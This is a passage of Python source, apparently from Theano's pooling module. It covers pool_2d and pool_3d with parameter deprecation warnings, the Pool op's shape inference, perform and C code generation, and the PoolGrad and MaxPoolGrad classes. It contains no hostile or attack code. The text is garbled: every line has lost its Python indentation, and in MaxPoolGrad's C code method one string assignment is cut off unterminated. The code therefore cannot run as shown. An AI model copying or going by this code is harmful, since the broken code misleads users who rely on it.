)
else:
warnings.warn(
"DEPRECATION: the 'st' parameter is not going to exist"
" anymore as it is going to be replaced by the parameter"
" 'stride'.",
stacklevel=2
)
stride = st
if padding is not None:
if pad not in {None, (0, 0)}:
raise ValueError(
"You can't provide a tuple value to both 'padding' and pad."
" Please provide a value only to pad."
)
else:
warnings.warn(
"DEPRECATION: the 'padding' parameter is not going to exist"
" anymore as it is going to be replaced by the parameter"
" 'pad'.",
stacklevel=2
)
pad = padding
if input.ndim < 2:
raise NotImplementedError('pool_2d requires a dimension >= 2')
if ignore_border is None:
warnings.warn(
"pool_2d() will have the parameter ignore_border"
" default value changed to True (currently"
" False). To have consistent behavior with all Theano"
" version, explicitly add the parameter ignore_border=True."
" On the GPU, using ignore_border=True is needed to use cuDNN."
" When using ignore_border=False and not using cuDNN, the only"
" GPU combination supported is when"
" `ws == stride and pad == (0, 0) and mode == 'max'`."
" Otherwise, the convolution will be executed on CPU.",
stacklevel=2)
ignore_border = False
op = Pool(ignore_border, ndim=2, mode=mode)
output = op(input, ws, stride, pad)
return output
def pool_3d(input, ws=None, ignore_border=None, stride=None, pad=(0, 0, 0),
mode='max', ds=None, st=None, padding=None):
if ds is not None:
if ws is not None:
raise ValueError(
"You can't provide a tuple value to both 'ws' and 'ds'."
" Please provide a value only to 'ws'."
)
else:
warnings.warn(
"DEPRECATION: the 'ds' parameter is not going to exist"
" anymore as it is going to be replaced by the parameter"
" 'ws'.",
stacklevel=2
)
ws = ds
elif ds is None and ws is None:
raise ValueError(
"You must provide a tuple value for the window size."
)
if st is not None:
if stride is not None:
raise ValueError(
"You can't provide a tuple value to both 'st and 'stride'."
" Please provide a value only to 'stride'."
)
else:
warnings.warn(
"DEPRECATION: the 'st' parameter is not going to exist"
" anymore as it is going to be replaced by the parameter"
" 'stride'.",
stacklevel=2
)
stride = st
if padding is not None:
if pad not in {None, (0, 0, 0)}:
raise ValueError(
"You can't provide a tuple value to both 'padding' and pad."
" Please provide a value only to pad."
)
else:
warnings.warn(
"DEPRECATION: the 'padding' parameter is not going to exist"
" anymore as it is going to be replaced by the parameter"
" 'pad'.",
stacklevel=2
)
pad = padding
if input.ndim < 3:
raise NotImplementedError('pool_3d requires a dimension >= 3')
if ignore_border is None:
warnings.warn(
"pool_3d() will have the parameter ignore_border"
" default value changed to True (currently"
" False). To have consistent behavior with all Theano"
" version, explicitly add the parameter ignore_border=True."
" On the GPU, using ignore_border=True is needed to use cuDNN."
" When using ignore_border=False and not using cuDNN, the only"
" GPU combination supported is when"
" `ws == stride and pad == (0, 0, 0) and mode == 'max'`."
" Otherwise, the convolution will be executed on CPU.",
stacklevel=2)
ignore_border = False
op = Pool(ignore_border, ndim=3, mode=mode)
output = op(input, ws, stride, pad)
return output
PoolingMode_t = EnumList(('POOLING_MAX', 'max'),
('POOLING_SUM', 'sum'),
('POOLING_AVERAGE_COUNT_INCLUDE_PADDING', 'average_inc_pad'),
('POOLING_AVERAGE_COUNT_EXCLUDE_PADDING', 'average_exc_pad'))
class Pool(OpenMPOp):
__props__ = ('ignore_border', 'mode', 'ndim')
params_type = ParamsType(ignore_border=bool_t,)
@staticmethod
def out_shape(imgshape, ws=None, ignore_border=False, stride=None, pad=None,
ndim=2, ds=None, st=None, padding=None):
if ds is not None:
if ws is not None:
raise ValueError(
"You can't provide a tuple value to both 'ws' and 'ds'."
" Please provide a value only to 'ws'."
)
else:
warnings.warn(
"DEPRECATION: the 'ds' parameter is not going to exist"
" anymore as it is going to be replaced by the parameter"
" 'ws'.",
stacklevel=2
)
ws = ds
elif ds is None and ws is None:
raise ValueError(
"You must provide a tuple value for the window size."
)
if st is not None:
if stride is not None:
raise ValueError(
"You can't provide a tuple value to both 'st and 'stride'."
" Please provide a value only to 'stride'."
)
else:
warnings.warn(
"DEPRECATION: the 'st' parameter is not going to exist"
" anymore as it is going to be replaced by the parameter"
" 'stride'.",
stacklevel=2
)
stride = st
if padding is not None:
zero_pad = (0,) * ndim
if pad not in {None, zero_pad}:
raise ValueError(
"You can't provide a tuple value to both 'padding' and pad."
" Please provide a value only to pad."
)
else:
warnings.warn(
"DEPRECATION: the 'padding' parameter is not going to"
" exist anymore as it is going to be replaced by the"
" parameter 'pad'.",
stacklevel=2
)
pad = padding
if ndim is None:
ndim = 2
assert ndim > 0
if len(imgshape) < ndim:
raise TypeError('imgshape must have at least {} dimensions'.format(ndim))
if stride is None:
stride = ws
if pad is None:
pad = (0,) * ndim
patch_shape = tuple(tensor.extract_constant(imgshape[-ndim + i]) + pad[i] * 2
for i in xrange(ndim))
def compute_out(v, downsample, stride):
if ignore_border:
if downsample == stride:
return v // stride
else:
out = (v - downsample) // stride + 1
if isinstance(out, theano.Variable):
return tensor.maximum(out, 0)
else:
return np.maximum(out, 0)
else:
if isinstance(v, theano.Variable):
return tensor.switch(tensor.ge(stride, downsample),
(v - 1) // stride + 1,
tensor.maximum(0, (v - 1 - downsample) //
stride + 1) + 1)
elif stride >= downsample:
return (v - 1) // stride + 1
else:
return max(0, (v - 1 - downsample + stride) // stride) + 1
out_shape = [compute_out(patch_shape[i], ws[i], stride[i]) for i in xrange(ndim)]
rval = list(imgshape[:-ndim]) + out_shape
return rval
def __init__(self, ignore_border=False, mode='max', ndim=2, openmp=None):
super(Pool, self).__init__(openmp=openmp)
self.ndim = ndim
self.ignore_border = ignore_border
if mode == 'max_deterministic':
mode = 'max'
if mode not in ['max', 'average_inc_pad', 'average_exc_pad', 'sum']:
raise ValueError(
"Pool mode parameter only support 'max', 'sum',"
" 'average_inc_pad' and 'average_exc_pad'. Got %s" % mode)
self.mode = mode
def prepare_node(self, node, storage_map, compute_map, impl):
if len(node.inputs) == 1:
self.ndim = len(node.op.ds)
self.mode = node.op.mode
ws = theano.tensor.constant(node.op.ds)
st = theano.tensor.constant(node.op.st)
pad = theano.tensor.constant(node.op.padding)
node.inputs.append(ws)
node.inputs.append(st)
node.inputs.append(pad)
if isinstance(ws, theano.Constant):
storage_map[ws] = [ws.data]
compute_map[ws] = [True]
else:
storage_map[ws] = [None]
compute_map[ws] = [False]
if isinstance(st, theano.Constant):
storage_map[st] = [st.data]
compute_map[st] = [True]
else:
storage_map[st] = [None]
compute_map[st] = [False]
if isinstance(pad, theano.Constant):
storage_map[pad] = [pad.data]
compute_map[pad] = [True]
else:
storage_map[pad] = [None]
compute_map[pad] = [False]
def make_node(self, x, ws, stride=None, pad=None):
x = tensor.as_tensor_variable(x)
nd = self.ndim
if stride is None:
stride = ws
if pad is None:
pad = (0,) * nd
elif isinstance(pad, (tuple, list)):
if max(pad) != 0 and not self.ignore_border:
raise NotImplementedError(
'padding works only with ignore_border=True')
if isinstance(ws, (tuple, list)):
if any(pad[i] >= ws[i] for i in range(nd)):
raise NotImplementedError(
'padding must be smaller than strides')
ws = tensor.as_tensor_variable(ws)
stride = tensor.as_tensor_variable(stride)
pad = tensor.as_tensor_variable(pad)
assert ws.ndim == 1
assert stride.ndim == 1
assert pad.ndim == 1
if x.type.ndim < nd:
raise TypeError()
if ws.dtype not in tensor.int_dtypes:
raise TypeError('Pool downsample parameters must be ints.')
if stride.dtype not in tensor.int_dtypes:
raise TypeError('Stride parameters must be ints.')
if pad.dtype not in tensor.int_dtypes:
raise TypeError('Padding parameters must be ints.')
broad = x.broadcastable[:-nd] + (False,) * nd
out = tensor.TensorType(x.dtype, broad)
return gof.Apply(self, [x, ws, stride, pad], [out()])
def perform(self, node, inp, out, params):
x, ws, stride, pad = inp
z, = out
nd = self.ndim
assert ws.shape == stride.shape == pad.shape == (nd,)
if len(x.shape) < nd:
raise NotImplementedError(
'Pool requires input with {} or more dimensions'.format(nd))
z_shape = self.out_shape(x.shape, ws, params.ignore_border, stride, pad, nd)
if not params.ignore_border:
assert all(z > 0 for z in z_shape[-nd:])
if (z[0] is None) or (z[0].shape != z_shape):
z[0] = np.empty(z_shape, dtype=x.dtype)
zz = z[0]
pool_out_shp = zz.shape[-nd:]
img_shp = tuple(x.shape[-nd + i] + 2 * pad[i] for i in xrange(nd))
inc_pad = self.mode == 'average_inc_pad'
if max(pad) != 0:
y = np.zeros(x.shape[:-nd] + img_shp, dtype=x.dtype)
y[(slice(None),) * (len(x.shape) - nd) +
tuple(slice(pad[i], img_shp[i] - pad[i]) for i in xrange(nd))] = x
else:
y = x
func = np.max
if self.mode == 'sum':
func = np.sum
elif self.mode != 'max':
func = np.average
region_slices = [[] for i in xrange(nd)]
for i in xrange(nd):
for j in xrange(pool_out_shp[i]):
start = j * stride[i]
end = builtins.min(start + ws[i], img_shp[i])
if not inc_pad:
start = builtins.max(start, pad[i])
end = builtins.min(end, img_shp[i] - pad[i])
region_slices[i].append(slice(start, end))
for k in np.ndindex(*x.shape[:-nd]):
zzk = zz[k]
yk = y[k]
for r in np.ndindex(*pool_out_shp):
zzk[r] = func(
yk[[region_slices[i][r[i]] for i in xrange(nd)]])
def infer_shape(self, node, in_shapes):
ws, stride, pad = [node.inputs[1], node.inputs[2], node.inputs[3]]
shp = self.out_shape(in_shapes[0], ws, self.ignore_border, stride,
pad, self.ndim)
return [shp]
def L_op(self, inputs, outputs, grads):
x, ws, stride, pad = inputs
gz, = grads
disc = [DisconnectedType()() for i in inputs[1:]]
if self.mode == 'max':
return [MaxPoolGrad(ndim=self.ndim,
ignore_border=self.ignore_border)(
x, outputs[0], gz, ws=ws, stride=stride, pad=pad)] + disc
else:
return [AveragePoolGrad(ndim=self.ndim,
ignore_border=self.ignore_border,
mode=self.mode)(
x, gz, ws=ws, stride=stride, pad=pad)] + disc
def connection_pattern(self, node):
return [[1], [0], [0], [0]]
def R_op(self, inputs, eval_points):
if self.mode != 'max':
eval_inputs = [eval_points[0]] + inputs[1:]
return [self(*eval_inputs)]
if eval_points[0] is None:
return [None]
z = self(*inputs)
x, ws, stride, pad = inputs
return [
DownsampleFactorMaxGradGrad(self.ignore_border, self.mode,
self.ndim)(x, z, eval_points[0], ws,
stride, pad)
]
def c_headers(self):
headers = ['<algorithm>']
headers += super(Pool, self).c_headers()
return headers
def c_code(self, node, name, inp, out, sub):
if self.mode not in ('max', 'sum', 'average_exc_pad', 'average_inc_pad'):
raise theano.gof.utils.MethodNotDefined()
x, ws, stride, pad = inp
z, = out
nd = self.ndim
total_ndim = node.inputs[0].ndim
non_pool_ndim = total_ndim - nd
fail = sub['fail']
params = sub['params']
if self.openmp:
omp_parallel = '#pragma omp parallel for private(r_st, r_end, r_idx, i_idx, o_idx, collector) schedule(static)'
else:
omp_parallel = ''
ccode = """
int typenum = PyArray_ObjectType((PyObject*)%(x)s, 0);
if(PyArray_NDIM(%(x)s)!=%(total_ndim)s)
{
PyErr_SetString(PyExc_ValueError, "x must be a %(total_ndim)sD ndarray");
%(fail)s;
}
if(PyArray_DIM(%(ws)s, 0)!=%(nd)s)
{
PyErr_SetString(PyExc_ValueError, "ws must be a vector of size %(nd)s");
%(fail)s;
}
if(PyArray_DIM(%(stride)s, 0)!=%(nd)s)
{
PyErr_SetString(PyExc_ValueError, "stride must be a vector of size %(nd)s");
%(fail)s;
}
if(PyArray_DIM(%(pad)s, 0)!=%(nd)s)
{
PyErr_SetString(PyExc_ValueError, "pad must be a vector of size %(nd)s");
%(fail)s;
}
int z[%(nd)s]; // shape of the output
int r[%(nd)s]; // shape of the padded_input
int ws[%(nd)s];
int st[%(nd)s];
int pd[%(nd)s];
int nonzero_padding;
nonzero_padding = 0;
for (int i=0; i<%(nd)s; i++)
{
ws[i] = *((npy_intp*)PyArray_GETPTR1(%(ws)s, i));
st[i] = *((npy_intp*)PyArray_GETPTR1(%(stride)s, i));
pd[i] = *((npy_intp*)PyArray_GETPTR1(%(pad)s, i));
r[i] = PyArray_DIMS(%(x)s)[%(non_pool_ndim)s + i] + 2 * pd[i];
if (pd[i]>0)
nonzero_padding = 1;
}
if (!%(params)s->ignore_border && nonzero_padding)
{
PyErr_SetString(PyExc_ValueError,
"padding must be zero when ignore border is False");
%(fail)s;
}
if (%(params)s->ignore_border)
{
for (int i=0; i<%(nd)s; i++)
{
// '/' in C is different from '/' in python
if (r[i] - ws[i] < 0)
{
z[i] = 0;
}
else
{
z[i] = (r[i] - ws[i]) / st[i] + 1;
}
}
}
else
{
for (int i=0; i<%(nd)s; i++)
{
// decide how many rows/cols the output has
if (st[i] >= ws[i])
{
z[i] = (r[i] - 1) / st[i] + 1;
}
else
{
z[i] = std::max(0, (r[i] - 1 - ws[i] + st[i]) / st[i]) + 1;
}
assert(z[i] > 0);
}
}
// memory allocation of z if necessary
int mem_nec;
mem_nec = 0;
if ((!%(z)s) || *PyArray_DIMS(%(z)s)!=%(total_ndim)s)
{
mem_nec = 1;
}
if (!mem_nec)
{
for (int i=0; i<%(non_pool_ndim)s; i++)
{
if (PyArray_DIMS(%(z)s)[i] != PyArray_DIMS(%(x)s)[i])
{
mem_nec = 1;
break;
}
}
}
if (!mem_nec)
{
for (int i=0; i<%(nd)s; i++)
{
if (PyArray_DIMS(%(z)s)[%(non_pool_ndim)s + i] != z[i])
{
mem_nec = 1;
break;
}
}
}
if (mem_nec)
{
if (%(z)s) Py_XDECREF(%(z)s);
npy_intp dims[%(total_ndim)s];
for (int i=0; i<%(non_pool_ndim)s; i++)
{
dims[i] = PyArray_DIMS(%(x)s)[i];
}
for (int i=0; i<%(nd)s; i++)
{
dims[%(non_pool_ndim)s + i] = z[i];
}
//TODO: zeros not necessary
%(z)s = (PyArrayObject*) PyArray_ZEROS(%(total_ndim)s, dims, typenum,0);
}
// initialize temp var for the value in a region
dtype_%(x)s collector;
int z_prod;
// do not run if any z[i] is zero
z_prod = 1;
for (int i=0; i<%(nd)s; i++)
{
z_prod *= z[i];
}
if (z_prod)
{
// will be used to hold start and end index of a region
int r_st[%(nd)s];
int r_end[%(nd)s];
// index for iterating over the pooling regions
int r_idx[%(nd)s];
// placeholder for PyArray indexing (output)
npy_intp o_idx[%(total_ndim)s];
// placeholder for PyArray indexing (input)
npy_intp i_idx[%(total_ndim)s];
// loop over non-pooling dimensions
int non_pooling_prod = 1;
for (int i=0; i<%(non_pool_ndim)s; i++)
{
non_pooling_prod *= PyArray_DIMS(%(x)s)[i];
}
%(omp_parallel)s
// first loop over non-pooling dimensions
for (int t=0; t<non_pooling_prod; t++)
{
// compute the non-pooling index in each dimension
if (%(non_pool_ndim)s!=0)
{
o_idx[0] = t;
i_idx[0] = t;
for (int i=1; i<%(non_pool_ndim)s; i++)
{
o_idx[i] = o_idx[i - 1] / PyArray_DIMS(%(x)s)[i - 1];
o_idx[i - 1] = o_idx[i - 1] %% PyArray_DIMS(%(x)s)[i - 1];
i_idx[i] = o_idx[i];
i_idx[i - 1] = o_idx[i - 1];
}
}
// then loop over each region in each pooling dimension
"""
for i in xrange(nd):
ccode += """
for (r_idx[%(i)s]=0; r_idx[%(i)s] < z[%(i)s]; r_idx[%(i)s]++) {
r_st[%(i)s] = r_idx[%(i)s] * st[%(i)s];
r_end[%(i)s] = r_st[%(i)s] + ws[%(i)s];
// skip the padding
r_st[%(i)s] = r_st[%(i)s] < pd[%(i)s] ? pd[%(i)s] : r_st[%(i)s];
r_end[%(i)s] = r_end[%(i)s] > (r[%(i)s] - pd[%(i)s]) ? r[%(i)s] - pd[%(i)s] : r_end[%(i)s];
// from padded_img space to img space
r_st[%(i)s] -= pd[%(i)s];
r_end[%(i)s] -= pd[%(i)s];
// handle the case where no padding, ignore border is True
if (%(params)s->ignore_border)
{
r_end[%(i)s] = r_end[%(i)s] > r[%(i)s] ? r[%(i)s] : r_end[%(i)s];
}
// use the index to find the correct position in the output
o_idx[%(non_pool_ndim)s + %(i)s] = r_idx[%(i)s];
""" % dict(i=i, non_pool_ndim=non_pool_ndim, params=sub['params'])
ccode += """
// get a pointer to the correct position in the output
dtype_%(z)s * z;
if (%(total_ndim)s == 4)
z = ((dtype_%(z)s*)(PyArray_GETPTR4(%(z)s, o_idx[0], o_idx[1], o_idx[2], o_idx[3])));
else
z = ((dtype_%(z)s*)(PyArray_GetPtr(%(z)s, o_idx)));
"""
if self.mode == 'max':
for i in xrange(nd):
ccode += """
// set the first index of dimension %(i)s
i_idx[%(non_pool_ndim)s + %(i)s] = r_st[%(i)s];
""" % dict(i=i, non_pool_ndim=non_pool_ndim)
ccode += """
// use the first element as the initial value of collector
if (%(total_ndim)s == 4)
collector = ((dtype_%(x)s*)(PyArray_GETPTR4(%(x)s,i_idx[0],i_idx[1],i_idx[2],i_idx[3])))[0];
else
collector = ((dtype_%(x)s*)(PyArray_GetPtr(%(x)s,i_idx)))[0];
"""
for i in xrange(nd):
ccode += """
// go through the pooled region in the unpadded input
for(int m%(i)s=r_st[%(i)s]; m%(i)s<r_end[%(i)s]; m%(i)s++)
{
i_idx[%(non_pool_ndim)s + %(i)s] = m%(i)s;
""" % dict(i=i, non_pool_ndim=non_pool_ndim)
ccode += """
// update maximum
dtype_%(x)s a;
if (%(total_ndim)s == 4)
a = ((dtype_%(x)s*)(PyArray_GETPTR4(%(x)s,i_idx[0],i_idx[1],i_idx[2],i_idx[3])))[0];
else
a = ((dtype_%(x)s*)(PyArray_GetPtr(%(x)s,i_idx)))[0];
collector = (a > collector) ? a : collector;
"""
for i in xrange(nd):
ccode += """
} // for loop over region
"""
ccode += """
z[0] = collector;
"""
elif self.mode in ('sum', 'average_exc_pad', 'average_inc_pad'):
ccode += """
// initialize the sum at zero
collector = ((dtype_%(x)s)(0));
"""
for i in xrange(nd):
ccode += """
// go through the pooled region in the unpadded input
for(int m%(i)s=r_st[%(i)s]; m%(i)s<r_end[%(i)s]; m%(i)s++)
{
i_idx[%(non_pool_ndim)s + %(i)s] = m%(i)s;
""" % dict(i=i, non_pool_ndim=non_pool_ndim)
ccode += """
// update sum
dtype_%(x)s a;
if (%(total_ndim)s == 4)
a = ((dtype_%(x)s*)(PyArray_GETPTR4(%(x)s,i_idx[0],i_idx[1],i_idx[2],i_idx[3])))[0];
else
a = ((dtype_%(x)s*)(PyArray_GetPtr(%(x)s,i_idx)))[0];
collector += a;
"""
for i in xrange(nd):
ccode += """
} // for loop over region
"""
if self.mode == "sum":
ccode += """
z[0] = collector;
"""
elif self.mode == 'average_inc_pad' and self.ignore_border:
region_size = ' * '.join('ws[%d]' % i for i in xrange(nd))
ccode += """
z[0] = collector / (%(region_size)s);
""" % dict(region_size=region_size)
else:
region_size = ' * '.join('(r_end[%d]-r_st[%d])' % (i, i) for i in xrange(nd))
ccode += """
z[0] = collector / (%(region_size)s);
""" % dict(region_size=region_size)
for i in xrange(nd):
ccode += """
} // loop over pooling dimension
"""
ccode += """
} // for loop over non-pooling dimensions
} // if z_prod
"""
return ccode % locals()
def c_code_cache_version(self):
return (9, self.openmp)
class PoolGrad(OpenMPOp):
__props__ = ('ignore_border', 'mode', 'ndim')
@staticmethod
def out_shape(imgshape, ws=None, ignore_border=False, stride=None, pad=None, ndim=2,
ds=None, st=None, padding=None):
if ds is not None:
if ws is not None:
raise ValueError(
"You can't provide a tuple value to both 'ws' and 'ds'."
" Please provide a value only to 'ws'."
)
else:
warnings.warn(
"DEPRECATION: the 'ds' parameter in PoolGrad is not going"
" to exist anymore as it is going to be replaced by the"
" parameter 'ws'.",
stacklevel=2
)
ws = ds
elif ds is None and ws is None:
raise ValueError(
"You must provide a tuple value for the window size."
)
if st is not None:
if stride is not None:
raise ValueError(
"You can't provide a tuple value to both 'st and 'stride'."
" Please provide a value only to 'stride'."
)
else:
warnings.warn(
"DEPRECATION: the 'st' parameter in PoolGrad is not going"
" to exist anymore as it is going to be replaced by the"
" parameter 'stride'.",
stacklevel=2
)
stride = st
if padding is not None:
if pad is not None:
raise ValueError(
"You can't provide a tuple value to both 'padding' and pad."
" Please provide a value only to pad."
)
else:
warnings.warn(
"DEPRECATION: the 'padding' parameter in PoolGrad is not"
" going to exist anymore as it is going to be replaced"
" by the parameter 'pad'.",
stacklevel=2
)
pad = padding
if len(imgshape) < ndim:
raise TypeError('imgshape must have at least {} dimensions'.format(ndim))
if stride is None:
stride = ws
if pad is None:
pad = (0,) * ndim
patch_shape = tuple(tensor.extract_constant(imgshape[-ndim + i]) + pad[i] * 2
for i in xrange(ndim))
def compute_out(v, downsample, stride):
if ignore_border:
out = (v - downsample) // stride + 1
if isinstance(out, theano.Variable):
return tensor.maximum(out, 0)
else:
return np.maximum(out, 0)
else:
if isinstance(v, theano.Variable):
return tensor.switch(tensor.ge(stride, downsample),
(v - 1) // stride + 1,
tensor.maximum(0, (v - 1 - downsample) //
stride + 1) + 1)
elif stride >= downsample:
return (v - 1) // stride + 1
else:
return max(0, (v - 1 - downsample) // stride + 1) + 1
out_shape = [compute_out(patch_shape[i], ws[i], stride[i]) for i in xrange(ndim)]
rval = list(imgshape[:-ndim]) + out_shape
return rval
def __init__(self, ignore_border, mode='max', ndim=2, openmp=None):
self.ndim = ndim
self.ignore_border = ignore_border
if mode == 'max_deterministic':
mode = 'max'
if mode not in ['max', 'sum', 'average_inc_pad', 'average_exc_pad']:
raise ValueError(
"Pool mode parameter only support 'max', 'sum',"
" 'average_inc_pad' and 'average_exc_pad'. Got %s" % mode)
self.mode = mode
super(PoolGrad, self).__init__(openmp=openmp)
def prepare_node(self, node, storage_map, compute_map, impl):
if len(node.inputs) < 5:
self.ndim = len(node.op.ds)
self.mode = node.op.mode
ws = theano.tensor.constant(node.op.ds)
st = theano.tensor.constant(node.op.st)
pad = theano.tensor.constant(node.op.padding)
node.inputs.append(ws)
node.inputs.append(st)
node.inputs.append(pad)
if isinstance(ws, theano.Constant):
storage_map[ws] = [ws.data]
compute_map[ws] = [True]
else:
storage_map[ws] = [None]
compute_map[ws] = [False]
if isinstance(st, theano.Constant):
storage_map[st] = [st.data]
compute_map[st] = [True]
else:
storage_map[st] = [None]
compute_map[st] = [False]
if isinstance(pad, theano.Constant):
storage_map[pad] = [pad.data]
compute_map[pad] = [True]
else:
storage_map[pad] = [None]
compute_map[pad] = [False]
def infer_shape(self, node, in_shapes):
return [in_shapes[0]]
class MaxPoolGrad(PoolGrad):
def __init__(self, ignore_border, ndim=2, openmp=None):
PoolGrad.__init__(self, ignore_border, mode='max', ndim=ndim, openmp=openmp)
def make_node(self, x, maxout, gz, ws, stride=None, pad=None):
# make_node should only be called by the grad function of
# Pool, so these asserts should not fail.
x = tensor.as_tensor_variable(x)
maxout = tensor.as_tensor_variable(maxout)
gz = tensor.as_tensor_variable(gz)
nd = self.ndim
if stride is None:
stride = ws
if pad is None:
pad = (0,) * nd
ws = tensor.as_tensor_variable(ws)
stride = tensor.as_tensor_variable(stride)
pad = tensor.as_tensor_variable(pad)
assert isinstance(x, Variable) and x.ndim >= nd
assert isinstance(maxout, Variable) and maxout.ndim >= nd
assert isinstance(gz, Variable) and gz.ndim >= nd
assert isinstance(ws, Variable) and ws.ndim == 1
assert isinstance(stride, Variable) and stride.ndim == 1
assert isinstance(pad, Variable) and pad.ndim == 1
assert x.ndim == maxout.ndim == gz.ndim >= nd
if ws.dtype not in tensor.int_dtypes:
raise TypeError('Pool downsample parameters must be ints.')
if stride.dtype not in tensor.int_dtypes:
raise TypeError('Stride parameters must be ints.')
if pad.dtype not in tensor.int_dtypes:
raise TypeError('Padding parameters must be ints.')
return Apply(self, [x, maxout, gz, ws, stride, pad], [x.type()])
def perform(self, node, inp, out):
assert self.mode == 'max'
x, maxout, gz, ws, stride, pad = inp
gx_stg, = out
nd = self.ndim
assert ws.shape == stride.shape == pad.shape == (nd,)
if len(x.shape) < nd:
raise NotImplementedError(
'MaxPoolGrad requires input with {} or more dimensions'.format(nd))
pool_out_shp = maxout.shape[-nd:]
img_shp = tuple(x.shape[-nd + i] + 2 * pad[i] for i in xrange(nd))
# pad the image
if max(pad) != 0:
y = np.zeros(x.shape[:-nd] + img_shp, dtype=x.dtype)
y[(slice(None),) * (len(x.shape) - nd) +
tuple(slice(pad[i], img_shp[i] - pad[i]) for i in xrange(nd))] = x
else:
y = x
gx = np.zeros_like(y)
# precompute the region boundaries for each dimension
region_ranges = [[] for i in xrange(nd)]
for i in xrange(nd):
for j in xrange(pool_out_shp[i]):
start = builtins.max(j * stride[i], pad[i])
end = builtins.min(start + ws[i], img_shp[i])
region_ranges[i].append(xrange(start, end))
# iterate over non-pooling dimensions
for k in np.ndindex(*x.shape[:-nd]):
gxk = gx[k]
gzk = gz[k]
yk = y[k]
maxoutk = maxout[k]
# iterate over pooling regions
for r in np.ndindex(*pool_out_shp):
maxout_value = maxoutk[r]
# iterate inside region
for c in itertools.product(*[region_ranges[i][r[i]]
for i in xrange(nd)]):
if maxout_value == yk[c]:
gxk[c] += gzk[r]
# unpad the image
gx = gx[(slice(None),) * (len(x.shape) - nd) +
tuple(slice(pad[i], img_shp[i] - pad[i]) for i in xrange(nd))]
gx_stg[0] = gx
def grad(self, inp, grads):
x, maxout, gz, ws, stride, pad = inp
ggx, = grads
return ([theano.tensor.zeros_like(x),
theano.tensor.zeros_like(maxout),
DownsampleFactorMaxGradGrad(ndim=self.ndim,
ignore_border=self.ignore_border)(
x, maxout, ggx, ws, stride, pad)] +
[DisconnectedType()() for i in inp[3:]])
def connection_pattern(self, node):
return [[1], [1], [1], [0], [0], [0]]
def c_code(self, node, name, inp, out, sub):
assert self.mode == 'max'
x, z, gz, ws, stride, pad = inp
gx, = out
nd = self.ndim
total_ndim = node.inputs[0].ndim
non_pool_ndim = total_ndim - nd
fail = sub['fail']
if self.openmp:
# run in parallel over each pooling block
omp_parallel = '
else:
omp_parallel = ''
ccode = """
// sanity checks
int x_typenum = PyArray_ObjectType((PyObject*)%(x)s, 0);
int z_typenum = PyArray_ObjectType((PyObject*)%(z)s, 0);
int gz_typenum = PyArray_ObjectType((PyObject*)%(gz)s, 0);
if ((x_typenum != z_typenum) || (x_typenum != gz_typenum))
{
PyErr_SetString(PyExc_ValueError, "input types must all match");
%(fail)s;
}
if(PyArray_NDIM(%(x)s)!=%(total_ndim)s)
{
PyErr_SetString(PyExc_ValueError, "x must be a %(total_ndim)sD ndarray");
%(fail)s;
}
if(PyArray_NDIM(%(z)s)!=%(total_ndim)s)
{
PyErr_SetString(PyExc_ValueError, "z must be a %(total_ndim)sD ndarray");
%(fail)s;
}
if(PyArray_NDIM(%(gz)s)!=%(total_ndim)s)
{
PyErr_SetString(PyExc_ValueError, "gz must be a %(total_ndim)sD ndarray");
%(fail)s;
}
if(PyArray_DIM(%(ws)s, 0)!=%(nd)s)
{
PyErr_SetString(PyExc_ValueError, "ws must be a vector of size %(nd)s");
%(fail)s;
}
if(PyArray_DIM(%(stride)s, 0)!=%(nd)s)
{
PyErr_SetString(PyExc_ValueError, "stride must be a vector of size %(nd)s");
%(fail)s;
}
if(PyArray_DIM(%(pad)s, 0)!=%(nd)s)
{
PyErr_SetString(PyExc_ValueError, "pad must be a vector of size %(nd)s");
%(fail)s;
}
int z[%(nd)s]; // shape of the output
int r[%(nd)s]; // shape of the padded_input
int ws[%(nd)s];
int st[%(nd)s];
int pd[%(nd)s];
int nonzero_padding;
nonzero_padding = 0;
for (int i=0; i<%(nd)s; i++)
{
ws[i] = *((npy_intp*)PyArray_GETPTR1(%(ws)s, i));
st[i] = *((npy_intp*)PyArray_GETPTR1(%(stride)s, i));
pd[i] = *((npy_intp*)PyArray_GETPTR1(%(pad)s, i));
z[i] = PyArray_DIMS(%(z)s)[%(non_pool_ndim)s + i];
r[i] = PyArray_DIMS(%(x)s)[%(non_pool_ndim)s + i] + 2 * pd[i];
if (pd[i]>0)
nonzero_padding = 1;
}
// allocating memory for output, if necessary
int mem_nec;
mem_nec = 0;
if ((!%(gx)s) || !PyArray_ISCONTIGUOUS(%(gx)s)
|| *PyArray_DIMS(%(gx)s)!=%(total_ndim)s)
{
mem_nec = 1;
}
if (!mem_nec)
{
for (int i=0; i<%(total_ndim)s; i++)
{
if (PyArray_DIMS(%(gx)s)[i] != PyArray_DIMS(%(x)s)[i])
{
mem_nec = 1;
break;
}
}
}
if (mem_nec)
{
Py_XDECREF(%(gx)s);
%(gx)s = (PyArrayObject*) PyArray_ZEROS(%(total_ndim)s, PyArray_DIMS(%(x)s), x_typenum,0);
}
else {
PyArray_FILLWBYTE(%(gx)s, 0);
}
dtype_%(z)s maximum; // temp var for maximum value in a region
int z_prod;
// do not run if any z[i] is zero
z_prod = 1;
for (int i=0; i<%(nd)s; i++)
{
z_prod *= z[i];
}
if (z_prod)
{
// will be used to hold start and end index of a region
int r_st[%(nd)s];
int r_end[%(nd)s];
// index for iterating over the pooling regions
int r_idx[%(nd)s];
// placeholder for PyArray indexing (output)
npy_intp o_idx[%(total_ndim)s];
// placeholder for PyArray indexing (input)
npy_intp i_idx[%(total_ndim)s];
// loop over non-pooling dimensions
int non_pooling_prod = 1;
for (int i=0; i<%(non_pool_ndim)s; i++)
{
non_pooling_prod *= PyArray_DIMS(%(x)s)[i];
}
%(omp_parallel)s
// first loop over non-pooling dimensions
for (int t=0; t<non_pooling_prod; t++)
{
// compute the non-pooling index in each dimension
if (%(non_pool_ndim)s!=0)
{
o_idx[0] = t;
i_idx[0] = t;
for (int i=1; i<%(non_pool_ndim)s; i++)
{
o_idx[i] = o_idx[i - 1] / PyArray_DIMS(%(x)s)[i - 1];
o_idx[i - 1] =o_idx[i - 1] %% PyArray_DIMS(%(x)s)[i - 1];
i_idx[i] = o_idx[i];
i_idx[i - 1] = o_idx[i - 1];
}
}
// then loop over each region in each pooling dimension
"""
for i in xrange(nd):
ccode += """
for (r_idx[%(i)s]=0; r_idx[%(i)s] < z[%(i)s]; r_idx[%(i)s]++) {
r_st[%(i)s] = r_idx[%(i)s] * st[%(i)s];
r_end[%(i)s] = r_st[%(i)s] + ws[%(i)s];
// skip the padding
